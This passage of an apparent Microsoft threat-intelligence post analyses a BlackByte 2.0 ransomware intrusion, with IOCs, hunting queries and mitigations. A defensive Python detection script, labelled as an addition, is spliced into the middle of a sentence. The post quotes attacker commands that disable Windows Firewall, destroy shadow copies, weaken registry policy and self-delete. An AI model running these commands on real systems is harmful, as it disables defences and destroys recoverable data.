As we learned from Microsoft\u2019s tracking of ransomware attacks and the [cybercriminal economy](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) that enables them, disrupting common attack patterns could stop many of the attacker activities that precede ransomware deployment. This case highlights that common security hygiene practices go a long way in preventing, identifying, and responding to malicious activity as early as possible to mitigate the impact of ransomware attacks. We encourage organizations to follow the outlined mitigation steps, including ensuring that internet-facing assets are up to date and configured securely. We also share indicators of compromise, detection details, and hunting guidance to help organizations identify and respond to these attacks in their environments. \n\n## Forensic analysis\n\n### Initial access and privilege escalation\n\nTo obtain initial access into the victim\u2019s environment, the threat actor was observed exploiting the [ProxyShell vulnerabilities](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 on unpatched Microsoft Exchange Servers. 
The exploitation of these vulnerabilities allowed the threat actor to:\n\n * Attain system-level privileges on the compromised Exchange host\n * Enumerate LegacyDN of users by sending Autodiscover requests, including SIDs of users\n * Construct a valid authentication token and use it against the Exchange PowerShell backend\n * Impersonate domain admin users and create a web shell by using the _New-MailboxExportRequest_ cmdlet\n * Create web shells to obtain remote control on affected servers\n\nThe threat actor was observed operating from the following IP to exploit ProxyShell and access the web shell:\n\n * 185.225.73[.]244\n\n### Persistence\n\n**Backdoor**\n\nAfter gaining access to a device, the threat actor created the following registry run keys to run a payload each time a user signs in:\n\nRegistry key| Value name| Value data \n---|---|--- \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\Users\\user\\Downloads\\api-msvc.dll,Default \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\temp\\api-msvc.dll,Default \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\systemtest\\api-system.png,Default \n \nThe file _api-msvc.dll_ (SHA-256: 4a066569113a569a6feb8f44257ac8764ee8f2011765009fdfd82fe3f4b92d3e) was determined to be a backdoor capable of collecting system information, such as the installed antivirus products, device name, and IP address. This information is then sent via HTTP POST request to the following C2 channel:\n\n * _hxxps://myvisit[.]alteksecurity[.]org/t_\n\nThe organization was not using Microsoft Defender Antivirus, which detects this malware as Trojan:Win32/Kovter!MSR, as the primary antivirus solution, and the backdoor was allowed to run.\n\nAn additional file, _api-system.png_, was identified to have similarities to _api-msvc.dll_. 
This file behaved like a DLL, had the same default export function, and also leveraged run keys for persistence.\n\n**Cobalt Strike Beacon**\n\nThe threat actor leveraged Cobalt Strike to achieve persistence. The file _sys.exe_ (SHA-256: 5f37b85687780c089607670040dbb3da2749b91b8adc0aa411fd6280b5fa7103), detected by Microsoft Defender Antivirus as Trojan:Win64/CobaltStrike!MSR, was determined to be a Cobalt Strike Beacon and was downloaded directly from the file sharing service _temp[.]sh_:\n\n * _hxxps://temp[.]sh/szAyn/sys.exe_\n\nThis beacon was configured to communicate with the following C2 channel:\n\n * 109.206.243[.]59:443\n\n**AnyDesk**\n\nThreat actors leverage legitimate remote access tools during intrusions to blend into a victim network. In this case, the threat actor utilized the remote administration tool AnyDesk to maintain persistence and move laterally within the network. AnyDesk was installed as a service and was run from the following paths:\n\n * _C:\\systemtest\\anydesk\\AnyDesk.exe_\n * _C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe_\n * _C:\\Scripts\\AnyDesk.exe_\n\nSuccessful connections were observed in the AnyDesk log file _ad_svc.trace_ involving anonymizer service IP addresses linked to TOR and MULLVAD VPN, a common technique that threat actors employ to obscure their source IP ranges.\n\n### Reconnaissance\n\nWe found the presence and execution of the network discovery tool NetScan being used by the threat actor to perform network enumeration using the following file names:\n\n * _netscan.exe_ (SHA-256: 1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e)\n * _netapp.exe_ (SHA-256: 1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e)\n\nAdditionally, execution of AdFind (SHA-256: f157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e), an Active Directory reconnaissance tool, was observed in the environment.\n\n### Credential access\n\nEvidence of likely usage of the credential theft tool 
Mimikatz was also uncovered through the presence of a related log file _mimikatz.log_. Microsoft IR assesses that Mimikatz was likely used to attain credentials for privileged accounts.\n\n### Lateral movement\n\nUsing compromised domain admin credentials, the threat actor used Remote Desktop Protocol (RDP) and PowerShell remoting to obtain access to other servers in the environment, including domain controllers.\n\n### Data staging and exfiltration\n\nIn one server where Microsoft Defender Antivirus was installed, a suspicious file named _explorer.exe_ was identified, detected as Trojan:Win64/WinGoObfusc.LK!MT, and quarantined. However, because tamper protection wasn\u2019t enabled on this server, the threat actor was able to disable the Microsoft Defender Antivirus service, enabling the threat actor to run the file using the following command:\n\nexplorer.exe P@$$w0rd\n\nAfter reverse engineering _explorer.exe_, we determined it to be ExByte, a GoLang-based tool developed and commonly used in BlackByte ransomware attacks for collection and exfiltration of files from victim networks. This tool is capable of enumerating files of interest across the network and, upon execution, creates a log file containing a list of files and associated metadata. Multiple log files were uncovered during the investigation in the path:\n\n * _C:\\Exchange\\MSExchLog.log_\n\nAnalysis of the binary revealed a list of file extensions that are targeted for enumeration.\n\nFigure 2. Binary analysis showing file extensions enumerated by _explorer.exe_\n\nForensic analysis identified a file named _data.txt_ that was created and later deleted after ExByte execution. This file contained obfuscated credentials that ExByte leveraged to authenticate to the popular file sharing platform Mega NZ using the platform\u2019s API at:\n\n * _hxxps://g.api.mega.co[.]nz_\nFigure 3. 
Binary analysis showing explorer.exe functionality for connecting to file sharing service MEGA NZ\n\nWe also determined that this version of ExByte was crafted specifically for the victim, as it contained a hardcoded device name belonging to the victim and an internal IP address.\n\n**ExByte execution flow**\n\nUpon execution, ExByte decodes several strings and checks if the process is running with privileged access by reading _\\\\\\\\.\\PHYSICALDRIVE0_:\n\n * If this check fails, _ShellExecuteW_ is invoked with the _lpOperation_ parameter _RunAs_, which runs _explorer.exe_ with elevated privileges.\n\nAfter this access check, _explorer.exe_ attempts to read the _data.txt_ file in the current location:\n\n * If the text file doesn\u2019t exist, it invokes a command for self-deletion and exits from memory:\n \n \n C:\\Windows\\system32\\cmd.exe /c ping 1.1.1.1 -n 10 > nul & Del <PATH>\\explorer.exe /F /Q\n \n\n * If _data.txt_ exists, _explorer.exe_ reads the file, passes the buffer to a Base64 decode function, and then decrypts the data using the key provided on the command line. The decrypted data is then parsed as the JSON below and passed to the login function:\n \n \n {\n \t\"a\":\"us0\",\n \t\"user\":\"<CONTENT FROM data.txt>\"\n }\n \n\nFinally, it forms a URL for sign-in to the API of the service MEGA NZ:\n\n * _hxxps://g.api.mega.co[.]nz/cs?id=1674017543_\n\n### Data encryption and destruction\n\nOn devices where files were successfully encrypted, we identified suspicious executables, detected by Microsoft Defender Antivirus as Trojan:Win64/BlackByte!MSR, with the following names:\n\n * _wEFT.exe_\n * _schillerized.exe_\n\nThe files were analyzed and determined to be BlackByte 2.0 binaries responsible for encryption across the environment. 
The binaries require an 8-digit key number to encrypt files.\n\nTwo modes of execution were identified:\n\n * When the _-s_ parameter is provided, the ransomware self-deletes and encrypts the machine it was executed on.\n * When the _-a_ parameter is provided, the ransomware conducts enumeration and uses an Ultimate Packer Executable (UPX) packed version of PsExec to deploy across the network. Several domain admin credentials were hardcoded in the binary, facilitating the deployment of the binary across the network.\n\nDepending on the switch (_-s_ or _-a_), execution may create the following files:\n\n * _C:\\SystemData\\M8yl89s7.exe_ (UPX-packed PsExec with a random name; SHA-256: ba3ec3f445683d0d0407157fda0c26fd669c0b8cc03f21770285a20b3133098f)\n * _C:\\SystemData\\wEFT.exe_ (Additional BlackByte binary)\n * _C:\\SystemData\\MsExchangeLog1.log_ (Log file)\n * _C:\\SystemData\\rENEgOtiAtES_ (A vulnerable (CVE-2019-16098) driver _RtCore64.sys_ used to evade detection by installed antivirus software; SHA-256: 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)\n * _C:\\SystemData\\iHu6c4.ico_ (Random name \u2013 BlackByte icon)\n * _C:\\SystemData\\BB_Readme_file.txt_ (BlackByte ReadMe file)\n * _C:\\SystemData\\skip_bypass.txt_ (Unknown)\n\n**BlackByte 2.0 ransomware capabilities**\n\nSome capabilities identified for the BlackByte 2.0 ransomware were:\n\n * Antivirus bypass\n * The file _rENEgOtiAtES_ created matches _RTCore64.sys_, a vulnerable driver (CVE-2019-16098) that allows any authenticated user to read or write to arbitrary memory\n * The BlackByte binary then creates and starts a service named _RABAsSaa_ calling _rENEgOtiAtES_, and exploits this service to evade detection by installed antivirus software\n * Process hollowing \n * Invokes _svchost.exe_, injects into it to complete device encryption, and self-deletes by executing the following command: \n * `cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del \u201cPATH_TO_BLACKBYTE\u201d /F /Q`\n * 
Modification / disabling of Windows Firewall \n * The following commands are executed to either modify existing Windows Firewall rules, or to disable Windows Firewall entirely:\n * `cmd /c netsh advfirewall set allprofiles state off`\n * `cmd /c netsh advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes`\n * `cmd /c netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes`\n * Modification of volume shadow copies \n * The following commands are executed to destroy volume shadow copies on the machine:\n * `cmd /c vssadmin Resize ShadowStorge /For=B:\\ /On=B:\\ /MaxSize=401MB`\n * `cmd /c vssadmin Resize ShadowStorage /For=B:\\ /On=B:\\ /MaxSize=UNBOUNDED`\n * Modification of registry keys/values \n * The following commands are executed to modify the registry, facilitating elevated execution on the device:\n * `cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f`\n * `cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f`\n * `cmd /c reg add HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f`\n * Additional functionality\n * Ability to terminate running services and processes\n * Ability to enumerate and mount volumes and network shares for encryption\n * Performs the anti-forensics technique timestomping (sets the file time of encrypted files and the ReadMe file to 2000-01-01 00:00:00)\n * Ability to perform anti-debugging techniques\n\n## Recommendations\n\nTo guard against BlackByte ransomware attacks, Microsoft recommends the following:\n\n * Ensure that you have a patch management process in place and that patching for internet-exposed devices is prioritized. Understand and assess your cyber exposure with advanced vulnerability and configuration assessment tools like [Microsoft Defender 
Vulnerability Management](<https://learn.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management?view=o365-worldwide>)\n * Implement an endpoint detection and response (EDR) solution like [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint>) to gain visibility into malicious activity in real time across your network\n * Ensure antivirus protections are updated regularly by [turning on cloud-based protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) and that your antivirus solution is configured to block threats\n * Enable [tamper protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) to prevent components of Microsoft Defender Antivirus from being disabled\n * Block inbound traffic from IPs specified in the indicators of compromise section of this report\n * Block inbound traffic from TOR exit nodes\n * Block inbound access from unauthorized public VPN services\n * Restrict administrative privileges to prevent unauthorized system changes\n\n## Conclusion\n\nBlackByte ransomware attacks target organizations that have infrastructure with unpatched vulnerabilities. As outlined in the [Microsoft Digital Defense Report](<https://www.microsoft.com/security/business/microsoft-digital-defense-report-2022>), common security hygiene practices, including keeping systems up to date, could protect against 98% of attacks.\n\nAs new tools are being developed by threat actors, a modern threat protection solution like Microsoft 365 Defender is necessary to prevent and detect the multiple techniques used in the attack chain, especially where the threat actor attempts to evade or disable specific defense mechanisms. 
Hunting for malicious behavior should be performed regularly to catch attacks that evade automated detections; it complements, rather than replaces, continuous monitoring of the alerts and incidents raised by security tools.\n\nTo understand how Microsoft can help you secure your network and respond to network compromise, visit https://aka.ms/MicrosoftIR.\n\n## Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects this threat as the following malware:\n\n * Trojan:Win32/Kovter!MSR\n * Trojan:Win64/WinGoObfusc.LK!MT\n * Trojan:Win64/BlackByte!MSR\n * HackTool:Win32/AdFind!MSR\n * Trojan:Win64/CobaltStrike!MSR\n\n**Microsoft Defender for Endpoint**\n\nThe following alerts might indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.\n\n * 'CVE-2021-31207' exploit malware was detected\n * An active 'NetShDisableFireWall' malware in a command line was prevented from executing.\n * Suspicious registry modification.\n * \u2018Rtcore64\u2019 hacktool was detected\n * Possible ongoing hands-on-keyboard activity (Cobalt Strike)\n * A file or network connection related to a ransomware-linked emerging threat activity group detected\n * Suspicious sequence of exploration activities\n * A process was injected with potentially malicious code\n * Suspicious behavior by cmd.exe was observed\n * 'Blackbyte' ransomware was detected\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-34473\n * CVE-2021-34523\n * CVE-2021-31207\n * CVE-2019-16098\n\n## Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following queries to find related activity in their networks:\n\n**ProxyShell web shell creation events**\n \n \n DeviceProcessEvents\n | where ProcessCommandLine 
has_any (\"ExcludeDumpster\",\"New-ExchangeCertificate\") and ProcessCommandLine has_any (\"-RequestFile\",\"-FilePath\")\n \n\n**Suspicious vssadmin events**\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_any (\"vssadmin\",\"vssadmin.exe\") and ProcessCommandLine has \"Resize ShadowStorage\" and ProcessCommandLine has_any (\"MaxSize=401MB\",\" MaxSize=UNBOUNDED\")\n \n\n**Detection for persistence creation using Registry Run keys**\n \n \n DeviceRegistryEvents \n | where ActionType == \"RegistryValueSet\" \n | where (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\RunOnce\" and RegistryValueName == \"MsEdgeMsE\") \n or (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\RunOnceEx\" and RegistryValueName == \"MsEdgeMsE\")\n or (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\Run\" and RegistryValueName == \"MsEdgeMsE\")\n | where RegistryValueData startswith @\"rundll32\"\n | where RegistryValueData endswith @\".dll,Default\"\n | project Timestamp,DeviceId,DeviceName,ActionType,RegistryKey,RegistryValueName,RegistryValueData\n \n\n**Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 
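The registry run-key and vssadmin queries above, together with the netsh, reg add and ping-then-del command lines listed under the BlackByte 2.0 capabilities, reduce to a handful of string predicates that can be checked offline against exported events. The following Python is an added example written for this page, not Microsoft's code and not part of the original post. It goes slightly beyond the run-key query above, which only matches value data ending in `.dll,Default`: the third run key on this page loads `api-system.png,Default`, which that query would miss, so the example flags any rundll32 autorun whose module lacks a .dll extension, in addition to the MsEdgeMsE value name and modules under temp or download directories. The vssadmin check accepts both `ShadowStorage` and the `ShadowStorge` spelling that appears in the command list above. The first three registry records mirror the run-key table on this page; the remaining registry and process records are constructed benign look-alikes, and all of them borrow the DeviceRegistryEvents and DeviceProcessEvents column names.

```python
import re
from typing import Dict, List, Tuple

RegistryEvent = Dict[str, str]

# Run, RunOnce and RunOnceEx keys under HKCU or HKLM, as in the query above.
RUN_KEY_RE = re.compile(
    r'\\Microsoft\\Windows\\CurrentVersion\\Run(Once|OnceEx)?$', re.IGNORECASE)
# rundll32 <module>,<export>. Quoted module paths containing spaces are not handled.
RUNDLL_RE = re.compile(
    r'^rundll32(\.exe)?\s+(?P<module>[^\s,]+),(?P<export>\w+)\s*$', re.IGNORECASE)
# Directories an unprivileged user can write to, where the observed backdoor lived.
USER_WRITABLE_RE = re.compile(r'\\(temp|downloads|appdata)\\', re.IGNORECASE)
KNOWN_VALUE_NAME = 'MsEdgeMsE'
# Both spellings present in the observed BlackByte command lines.
SHADOW_RESIZE_RE = re.compile(r'vssadmin(\.exe)?\s+resize\s+shadowstor(a)?ge\b', re.IGNORECASE)
# ping-as-sleep followed by del: the self-deletion idiom used by ExByte and BlackByte.
PING_SELF_DELETE_RE = re.compile(r'ping\s+1\.1\.1\.1\s+-n\s+\d+\s*>\s*nul\s*&\s*del\b', re.IGNORECASE)


def classify_run_key_value(event: RegistryEvent) -> List[str]:
    # Reasons a Run-key write resembles the observed persistence; empty list means no hit.
    if event.get('ActionType') != 'RegistryValueSet':
        return []
    if not RUN_KEY_RE.search(event.get('RegistryKey', '')):
        return []
    match = RUNDLL_RE.match(event.get('RegistryValueData', '').strip())
    if not match:
        return []
    module = match.group('module')
    reasons = []
    if event.get('RegistryValueName') == KNOWN_VALUE_NAME:
        reasons.append('known_value_name')
    if not module.lower().endswith('.dll'):
        reasons.append('non_dll_module')      # e.g. api-system.png,Default
    if USER_WRITABLE_RE.search(module):
        reasons.append('user_writable_path')
    return reasons


def classify_command_line(command_line: str) -> List[str]:
    # Reasons a command line matches the BlackByte defense-impairment commands.
    s = command_line.lower()
    reasons = []
    if SHADOW_RESIZE_RE.search(s) and ('maxsize=401mb' in s or 'maxsize=unbounded' in s):
        reasons.append('shadow_storage_resize')
    if 'netsh advfirewall' in s and 'set allprofiles state off' in s:
        reasons.append('firewall_disabled')
    if 'reg add' in s and 'localaccounttokenfilterpolicy' in s and '/d 1' in s:
        reasons.append('remote_uac_filter_disabled')
    if PING_SELF_DELETE_RE.search(s):
        reasons.append('ping_delay_self_delete')
    return reasons


def hunt_blackbyte(registry_events, command_lines) -> Dict[str, List[Tuple[str, List[str]]]]:
    registry_hits = []
    for event in registry_events:
        reasons = classify_run_key_value(event)
        if reasons:
            registry_hits.append((event.get('RegistryValueData', ''), reasons))
    process_hits = []
    for command_line in command_lines:
        reasons = classify_command_line(command_line)
        if reasons:
            process_hits.append((command_line, reasons))
    return {'registry': registry_hits, 'process': process_hits}


RUN_KEY = r'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
# Constructed sample events: the first three mirror the run-key table on this page,
# the last two are invented benign autoruns.
SAMPLE_REGISTRY_EVENTS = [
    {'ActionType': 'RegistryValueSet', 'RegistryKey': RUN_KEY, 'RegistryValueName': 'MsEdgeMsE',
     'RegistryValueData': r'rundll32 C:\Users\user\Downloads\api-msvc.dll,Default'},
    {'ActionType': 'RegistryValueSet', 'RegistryKey': RUN_KEY, 'RegistryValueName': 'MsEdgeMsE',
     'RegistryValueData': r'rundll32 C:\temp\api-msvc.dll,Default'},
    {'ActionType': 'RegistryValueSet', 'RegistryKey': RUN_KEY, 'RegistryValueName': 'MsEdgeMsE',
     'RegistryValueData': r'rundll32 C:\systemtest\api-system.png,Default'},
    {'ActionType': 'RegistryValueSet', 'RegistryKey': RUN_KEY, 'RegistryValueName': 'OneDrive',
     'RegistryValueData': r'C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background'},
    {'ActionType': 'RegistryValueSet', 'RegistryKey': RUN_KEY, 'RegistryValueName': 'Control',
     'RegistryValueData': r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'},
]
# Constructed command lines: the first five follow the commands listed on this page,
# the last two are routine administrative invocations that must not fire.
SAMPLE_COMMAND_LINES = [
    r'cmd /c vssadmin Resize ShadowStorage /For=C:\ /On=C:\ /MaxSize=UNBOUNDED',
    r'cmd /c vssadmin Resize ShadowStorge /For=C:\ /On=C:\ /MaxSize=401MB',
    'cmd /c netsh advfirewall set allprofiles state off',
    r'cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f',
    r'cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del C:\SystemData\wEFT.exe /F /Q',
    'vssadmin list shadows',
    'netsh advfirewall show allprofiles',
]

if __name__ == '__main__':
    for source, hits in hunt_blackbyte(SAMPLE_REGISTRY_EVENTS, SAMPLE_COMMAND_LINES).items():
        for value, reasons in hits:
            print(source, reasons, value)
```

The shell32.dll autorun is left unflagged on purpose: rundll32 under a Run key is common on its own, and the signal in the observed persistence is the combination of a fixed value name, a non-DLL module and a user-writable drop location, which is what the reason list records.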
More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post-exploitation activity detailed in this blog, in addition to the Microsoft 365 Defender detections listed above.\n\n * [ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>)\n * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web%20Shells%20Threat%20Protection/Hunting%20Queries/WebShellActivity.yaml>)\n * [Suspicious file downloads on Exchange Servers](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>)\n * [Firewall rule changes](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Hunting%20Queries/MultipleDataSources/FirewallRuleChanges_using_netsh.yaml>)\n * [Shadow copy deletion](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/ShadowCopyDeletion.yml>)\n * [Anomalous RDP activity](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Solutions/UEBA%20Essentials/Hunting%20Queries/Anomalous%20RDP%20Activity.yaml>)\n\n## Indicators of compromise\n\nThe table below shows IOCs observed during our investigation. 
We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.\n\nIndicator| Type| Description \n---|---|--- \n4a066569113a569a6feb8f44257ac8764ee8f2011765009fdfd82fe3f4b92d3e| SHA-256| api-msvc.dll (Backdoor installed through RunKeys) \n5f37b85687780c089607670040dbb3da2749b91b8adc0aa411fd6280b5fa7103| SHA-256| sys.exe (Cobalt Strike Beacon) \n01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd| SHA-256| rENEgOtiAtES (Vulnerable driver RtCore64.sys created by BlackByte binary) \nba3ec3f445683d0d0407157fda0c26fd669c0b8cc03f21770285a20b3133098f| SHA-256| [RANDOM_NAME].exe (UPX Packed PsExec created by BlackByte binary) \n1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e| SHA-256| \u201cnetscan.exe\u201d, \u201cnetapp.exe\u201d (Netscan network discovery tool) \nf157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e| SHA-256| AdFind.exe (Active Directory information gathering tool) \nhxxps://myvisit[.]alteksecurity[.]org/t| URL| C2 for backdoor api-msvc.dll \nhxxps://temp[.]sh/szAyn/sys.exe| URL| Download URL for sys.exe \n109.206.243[.]59| IP Address| C2 for Cobalt Strike Beacon sys.exe \n185.225.73[.]244| IP Address| Originating IP address for ProxyShell exploitation and web shell interaction \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Appendix\n\nFile extensions targeted by BlackByte binary for encryption:\n\n.4dd| .4dl| .accdb| .accdc| .accde| .accdr| .accdt| .accft \n---|---|---|---|---|---|---|--- \n.adb| .ade| .adf| .adp| .arc| .ora| .alf| .ask \n.btr| .bdf| .cat| .cdb| .ckp| .cma| .cpd| .dacpac \n.dad| .dadiagrams| .daschema| .db| .db-shm| .db-wal| .db3| .dbc \n.dbf| .dbs| .dbt| .dbv| .dbx| .dcb| .dct| .dcx \n.ddl| .dlis| .dp1| .dqy| .dsk| .dsn| .dtsx| .dxl \n.eco| .ecx| .edb| .epim| .exb| .fcd| .fdb| .fic \n.fmp| .fmp12| .fmpsl| .fol| .fp3| .fp4| .fp5| .fp7 \n.fpt| .frm| .gdb| .grdb| .gwi| .hdb| .his| .ib \n.idb| .ihx| .itdb| .itw| .jet| .jtx| .kdb| .kexi \n.kexic| .kexis| .lgc| .lwx| .maf| .maq| .mar| .masmav \n.mdb| .mpd| .mrg| .mud| .mwb| .myd| .ndf| .nnt \n.nrmlib| .ns2| .ns3| .ns4| .nsf| .nv| .nv2| .nwdb \n.nyf| .odb| .ogy| .orx| .owc| .p96| .p97| .pan \n.pdb| .pdm| .pnz| .qry| .qvd| .rbf| .rctd| .rod \n.rodx| .rpd| .rsd| .sas7bdat| .sbf| .scx| .sdb| .sdc \n.sdf| .sis| .spg| .sql| .sqlite| .sqlite3| .sqlitedb| .te \n.temx| .tmd| .tps| .trc| .trm| .udb| .udl| .usr \n.v12| .vis| .vpd| .vvv| .wdb| .wmdb| .wrk| .xdb \n.xld| .xmlff| .abcddb| .abs| .abx| .accdw| .and| .db2 \n.fm5| .hjt| .icg| .icr| .kdb| .lut| .maw| .mdn \n.mdt| | | | | | | \n \nShared folders targeted for encryption (Example: _\\\\\\\\[IP address]\\Downloads_):\n\nUsers| Backup| Veeam| homes| home \n---|---|---|---|--- \nmedia| common| Storage Server| Public| Web \nImages| Downloads| BackupData| ActiveBackupForBusiness| Backups \nNAS-DC| DCBACKUP| DirectorFiles| share| \n \nFile extensions ignored:\n\n.ini| .url| .msilog| .log| .ldf| .lock| .theme| .msi \n---|---|---|---|---|---|---|--- \n.sys| .wpx| .cpl| .adv| .msc| .scr| .key| .ico \n.dll| .hta| .deskthemepack| .nomedia| .msu| .rtp| .msp| .idx \n.ani| .386| .diagcfg| .bin| .mod| .ics| .com| .hlp \n.spl| .nls| .cab| .exe| .diagpkg| .icl| .ocx| .rom \n.prf| .thempack| .msstyles| .icns| .mpa| .drv| .cur| .diagcab \n.cmd| .shs| | | | | | \n \nFolders ignored:\n\nwindows| boot| program files (x86)| windows.old| programdata \n---|---|---|---|--- \nintel| bitdefender| trend micro| windowsapps| appdata \napplication data| system volume information| perflogs| msocache| \n \nFiles ignored:\n\nbootnxt| ntldr| bootmgr| thumbs.db \n---|---|---|--- \nntuser.dat| bootsect.bak| autoexec.bat| iconcache.db \nbootfont.bin| | | \n \nProcesses 
terminated:\n\nteracopy| teamviewer| nsservice| nsctrl| uranium \n---|---|---|---|--- \nprocesshacker| procmon| pestudio| procmon64| x32dbg \nx64dbg| cff explorer| procexp| pslist| tcpview \ntcpvcon| dbgview| rammap| rammap64| vmmap \nollydbg| autoruns| autorunssc| filemon| regmon \nidaq| idaq64| immunitydebugger| wireshark| dumpcap \nhookexplorer| importrec| petools| lordpe| sysinspector \nproc_analyzer| sysanalyzer| sniff_hit| windbg| joeboxcontrol \njoeboxserver| resourcehacker| fiddler| httpdebugger| dumpit \nrammap| rammap64| vmmap| agntsvc| cntaosmgr \ndbeng50| dbsnmp| encsvc| infopath| isqlplussvc \nmbamtray| msaccess| msftesql| mspub| mydesktopqos \nmydesktopservice| mysqld| mysqld-nt| mysqld-opt| Ntrtscan \nocautoupds| ocomm| ocssd| onenote| oracle \noutlook| PccNTMon| powerpnt| sqbcoreservice| sql \nsqlagent| sqlbrowser| sqlservr| sqlwriter| steam \nsynctime| tbirdconfig| thebat| thebat64| thunderbird \ntmlisten| visio| winword| wordpad| xfssvccon \nzoolz| | | | \n \nServices terminated:\n\nCybereasonRansomFree| vnetd| bpcd| SamSs| TeraCopyService \n---|---|---|---|--- \nmsftesql| nsService| klvssbridge64| vapiendpoint| ShMonitor \nSmcinst| SmcService| SntpService| svcGenericHost| Swi_ \nTmCCSF| tmlisten| TrueKey| TrueKeyScheduler| TrueKeyServiceHelper \nWRSVC| McTaskManager| OracleClientCache80| mfefire| wbengine \nmfemms| RESvc| mfevtp| sacsvr| SAVAdminService \nSepMasterService| PDVFSService| ESHASRV| SDRSVC| FA_Scheduler \nKAVFS| KAVFS_KAVFSGT| kavfsslp| klnagent| macmnsvc \nmasvc| MBAMService| MBEndpointAgent| McShield| audioendpointbuilder \nAntivirus| AVP| DCAgent| bedbg| EhttpSrv \nMMS| ekrn| EPSecurityService| EPUpdateService| ntrtscan \nEsgShKernel| msexchangeadtopology| AcrSch2Svc| MSOLAP$TPSAMA| Intel(R) PROSet Monitoring \nmsexchangeimap4| ARSM| unistoresvc_1af40a| ReportServer$TPS| MSOLAP$SYSTEM_BGC \nW3Svc| MSExchangeSRS| ReportServer$TPSAMA| Zoolz 2 Service| MSOLAP$TPS \naphidmonitorservice| SstpSvc| MSExchangeMTA| ReportServer$SYSTEM_BGC| 
